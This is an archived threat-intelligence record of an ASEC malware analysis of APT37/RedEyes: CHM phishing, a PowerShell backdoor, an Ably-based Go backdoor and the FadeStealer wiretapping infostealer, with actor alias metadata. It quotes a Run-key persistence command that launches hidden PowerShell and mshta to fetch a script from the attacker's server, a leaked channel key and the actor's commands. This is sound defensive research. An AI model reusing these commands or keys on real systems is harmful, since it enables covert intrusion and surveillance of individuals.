{
	"id": "8cb82f79-1db2-47d3-9dfe-cc39cb1da7a9",
	"created_at": "2026-04-06T00:16:20.312178Z",
	"updated_at": "2026-04-10T03:38:06.64126Z",
	"deleted_at": null,
	"sha1_hash": "9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138",
	"title": "RedEyes Group Wiretapping Individuals (APT37) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 810399,
	"plain_text": "RedEyes Group Wiretapping Individuals (APT37) - ASEC\r\nBy ATCP\r\nPublished: 2023-06-11 · Archived: 2026-04-05 20:19:50 UTC\r\n1. Overview\r\nRedEyes (also known as APT37, ScarCruft, and Reaper) is a state-sponsored APT group that mainly carries out attacks against individuals such as North Korean defectors, human rights activists, and university professors. Their task is known to be monitoring the lives of specific individuals. In May 2023, AhnLab Security Emergency Response Center (ASEC) discovered the RedEyes group distributing and using a previously unknown Infostealer with wiretapping features, along with a backdoor developed in GoLang that abuses the Ably platform.\r\n* Ably [1] is a platform for real-time data transfer and messaging. It can also perform publish/subscribe messaging, push notifications, real-time queries, and state synchronization.\r\nThe threat actor sent their commands through the GoLang backdoor using the Ably service. The API key value required for command communication was saved in a GitHub repository. This API key is necessary for communicating with the threat actor’s channel, so anyone who knows the key value is able to subscribe to it. Because of this, some of the commands used by the threat actor at the time of analysis could be identified.\r\nASEC aims to share the tactics, techniques, and procedures (TTPs) utilized by the RedEyes group during their attacks in May 2023. From the initial breach technique, all the way to privilege escalation, command and control, and exfiltration, each stage used by the RedEyes group to monitor individuals will be covered in this blog post.\r\n2. Analysis\r\n2.1. Initial Access\r\nThe threat actor used a CHM (Compiled HTML Help) file to carry out their initial breach. Similar to the case covered back in March, “Malware Distributed Disguised as a Password File” [2], it is assumed that targets were approached via spear phishing emails with a normal password-protected document and CHM malware disguised as a password file attached to them. In other words, by compressing a normal password-protected document together with the CHM malware, the threat actor led users into believing that the CHM file had to be executed in order to view the password-protected document.\r\nWhen a user executes the CHM file, they see the password information shown in Figure 3. However, the internal script code in the CHM shown in Figure 4 triggers MSHTA.exe, which in turn executes a malicious script fetched from the threat actor’s C\u0026C server.\r\nThe malicious script obtained during the analysis was confirmed to be PowerShell malware that maintains persistence through an autorun registry key. It also has a backdoor feature.\r\nThe PowerShell malware covered in the February 2023 post, “HWP Malware Using the Steganography Technique” [3], had relatively simple features: it executed the threat actor’s commands through CMD.exe and sent back the results, and it registered itself in the Run registry key for persistence. Although the recently obtained PowerShell malware still uses the same registry key registration for persistence, it does not use CMD.exe and instead performs different behaviors according to the C\u0026C server command. The features are shown below in Table 1.\r\nCommand | Feature\r\nfileinfo | Sends the file list and information (name, size, modified time) in a specific path, saved as a CSV, to the C\u0026C server and then deletes the CSV\r\ndir | Compresses folders in a specific path and sends the compressed file to the C\u0026C server before deleting the file\r\nfile | Uploads a specific file to the C\u0026C server\r\ndown | Downloads files to a specific path\r\nregedit | Edits the registry\r\ntask | Registers a scheduled task so the script is executed repeatedly at 10-minute intervals\r\nzip | Uncompresses files in a specific path\r\nrename | Changes the name of a specific file\r\ndel | Deletes files in a specific path\r\nTable 1. PowerShell backdoor features\r\n2.2. Persistence\r\nThe malicious PowerShell script executed by MSHTA.exe uses the command below to register itself in the autorun registry key, allowing malicious scripts from the threat actor’s C\u0026C server to be executed even after system reboots.\r\nNew-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name kcJuWlrQO -Value ‘c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 569782 2.2.2.2 || mshta hxxp://172.93.181[.]249/control/html/1.html’ -PropertyType String -Force;\r\n2.3. Command and Control\r\nThe threat actor carried out later attack stages such as privilege escalation, exfiltration, and malware distribution through a GoLang-based backdoor that utilizes the Ably platform service. The Ably platform is capable of transferring data in real time, and anyone with a channel authentication key can access the channel to receive messages. During the analysis, ASEC managed to secure the authentication key of the threat actor’s channel and view some of the commands that were sent to targets.\r\nTime of Transmission | Executed Command\r\n2023-05-09 10:16:16 | forfiles /p c:\\programdata\r\n2023-05-09 10:49:47 | ren c:\\programdata\\wallpaper-river.jpg wallpaper-river.exe\r\n2023-05-09 10:49:53 | forfiles /p c:\\programdata\r\n2023-05-09 10:50:09 | wmic OS get Caption,CSDVersion,OSArchitecture,Version\r\n2023-05-09 10:50:35 | c:\\programdata\\wallpaper-river.exe\r\nTable 2. Commands executed through the AblyGo backdoor\r\nThe RedEyes group using Ably to send commands has been reported before by KISA [4] and Sekoia [5]. The Ably-based GoLang backdoor found at that time had the authentication key within its binary, as shown in Figure 6, but the backdoor obtained in this instance stores the authentication key in a GitHub repository, allowing the authentication key to be retrieved dynamically for channel communication. This was most likely done so that the Ably channel authentication key could be changed frequently and to prevent third parties from reading the channel messages.\r\nThe GoLang backdoor accesses the GitHub URL embedded in its binary and retrieves data in the “\u003c\u003eBASE64-encoded channel authentication key” format in order to obtain the Ably channel authentication key. This method can also be seen in Figure 4 of “The Unintentional Leak: A glimpse into the attack vectors of APT37” [6], published by Zscaler back in March 2023. According to that post, the threat actor frequently committed strings encoded in BASE64. Decoding the string shown in Figure 4 yields the Ably authentication key value.\r\n[GitHub Commit String]\r\n\u003c\u003eS3dITXZ3LmJvaUMzdzpqR2JmMDd3VW9iN3RGanoxM1dxRFE4WJRsVFBDbVBQdldzb3hZYjFxc21r\r\n[GitHub Decoded String]\r\n\u003c\u003eKwHMvw.boiC3w:jGbf07wUob7tFjz13WqDQ8X.lTPCmPPvWsoxYb1qsmk (Ably authentication key)\r\nIf the AblyGo backdoor is executed on an infected system, the “\u003c\u003eauthentication key” string is retrieved from GitHub. It then parses out “\u003c\u003e” with the code shown in Figure 7 before BASE64-decoding the string that follows. The threat actor’s Ably channel is then accessed with the decoded authentication key, where messages named “UP” and “DOWN” are transmitted and received. The format and features of the transmitted and received data are shown below in Table 3.\r\nMessage Name (Feature) | Data Format\r\nUP (Sends HELLO and uploads command result) | {“Id”:”PC Name”,”Textdata”:”SEVMTw==”}\r\nDOWN (Transmits CMD command) | {“Id”:”PC Name”,”Textdata”:”SEVMTw==”}\r\nTable 3. Format and features of the AblyGo backdoor’s transmitted and received messages\r\nAfter AblyGo is executed on an infected PC, it sends the “HELLO” data encoded in BASE64 at an interval of about 2 to 5 minutes to signify that the PC is connected to the threat actor’s Ably channel (message name: UP). The threat actor monitors the Ably channel and identifies the ID of the infected PC. They then encode a command in BASE64 and transmit it (message name: DOWN).\r\nThe execution of commands received from the C\u0026C server is performed exclusively through CMD.exe, and the results of the CMD commands are transmitted back to the channel using the “UP” message. In other words, “UP” serves as a message for the threat actor to identify the infected PC and receive command results, while “DOWN” is used as a message for issuing commands.\r\n2.4. Privilege Escalation\r\nAfter command and control, the threat actor uses a known technique, T1546.015 (Event Triggered Execution: Component Object Model Hijacking), to execute additional malware. The malware registered to the registry key in Figure 8 could not be secured.\r\n2.5. Exfiltration\r\nThe threat actor utilizes the AblyGo backdoor and the MSHTA PowerShell script to ultimately execute an Infostealer in fileless form.\r\nThe executed Infostealer has various features, such as taking screenshots, exfiltrating data from removable media devices \u0026 smartphones, keylogging, and wiretapping.\r\nBased on the characteristic folder name where the exfiltrated data is stored, ASEC has named this newly discovered malware FadeStealer (Fade as a stealer). FadeStealer creates individual folders for each type of exfiltrated data in the %temp% directory. It uses a RAR compression utility embedded within the file to compress the exfiltrated data from the infected PC at 30-minute intervals using a password. FadeStealer has a meticulous side to it, as it employs the split compression feature, limiting each volume to a maximum of 1 GB if the compressed file ever exceeds 1 GB.\r\nFolder Path | Exfiltrated Data\r\n%temp%\\VSTelems_Fade\\NgenPdbc | Screenshots\r\n%temp%\\VSTelems_Fade\\NgenPdbk | Keylogging\r\n%temp%\\VSTelems_Fade\\NgenPdbm | Microphone wiretapping\r\n%temp%\\VSTelems_FadeIn | Data collected from smartphone devices\r\n%temp%\\VSTelems_FadeOut | Removable media devices\r\nTable 4. Folder paths and exfiltrated data\r\nCompression Option | Feature Explanation\r\na | Add compressed file\r\nr | Recover compressed file\r\nep1 | Remove base directory from name\r\nm0 | Set compression level (save)\r\ny | Automatically answer yes to all questions\r\np NaeMhq[d]q | Set compression password as NaeMhq[d]q\r\nv1g | Set compression volume limit to 1 GB\r\nTable 5. Compression options\r\n3. Conclusion\r\nThe RedEyes group carries out attacks against specific individuals such as North Korean defectors, human rights activists, and university professors. Their primary focus is on information theft, and an Infostealer with a feature to wiretap microphones was discovered in this recent attack case. Unauthorized eavesdropping on individuals in South Korea is considered a violation of privacy and is strictly regulated under relevant laws. Despite this, the threat actor monitored everything victims did on their PC and even conducted wiretapping.\r\nLooking at the overall attack flow in this case, the threat actor carried out their attack cleverly and precisely by employing spear phishing emails to gain access to target systems and using an Ably channel as a command-and-control server. These sorts of attacks are difficult for individuals to notice. As such, ASEC is closely tracking the activities of the RedEyes group and responding promptly to prevent further damage.\r\nUsers must refrain from opening files from unknown sources to prevent themselves from being harmed. Especially now, since the group in question has recently been using malware based on CHM and LNK extensions for their initial breach, extra attention should be given to file extensions when executing email attachments. File extensions are hidden by default, so it is recommended to refer to Figure 14 and uncheck “Hide extensions for known file types”. If the attached files are CHM or LNK, then it is crucial that you verify the source of the email before executing them.\r\n4. Reference\r\n[1] Ably\r\n[2] Malware Distributed Disguised as a Password File\r\n[3] HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)\r\n[4] TTPs $ ScarCruft Tracking Note – KISA\r\n[5] Peeking at Reaper’s surveillance operations – Sekoia\r\n[6] The Unintentional Leak: A glimpse into the attack vectors of APT37 – Zscaler\r\n[File Detection]\r\nTrojan/Win.Goably.C5436296 (2023.06.03.00)\r\nTrojan/Win.Goably.C5422375 (2023.05.09.02)\r\nTrojan/Win.Loader.C5424444 (2023.05.09.02)\r\nData/BIN.RedEyes (2023.06.08.01)\r\nDownloader/CHM.Generic (2023.06.02.03)\r\nDownloader/PowerShell.Generic (2023.06.06.00)\r\n[Behavior Detection]\r\nInjection/EDR.Event.M11124\r\n[Exfiltrated Data Save URL]\r\nhxxp://172.93.181[.]249/control/data/\r\n[AblyGo Backdoor Upload Path]\r\nhxxp://172.93.181[.]249/file/\r\n[PowerShell Backdoor Download URL After Initial Breach Stage]\r\nhxxp://172.93.181[.]249/control/html/1.html\r\nMD5\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/54349/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/54349/"
	],
	"report_names": [
		"54349"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434580,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138.pdf",
		"text": "https://archive.orkl.eu/9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138.txt",
		"img": "https://archive.orkl.eu/9446c9ab7571d7f4ca0ddcf5cfd38ab97bd10138.jpg"
	}
}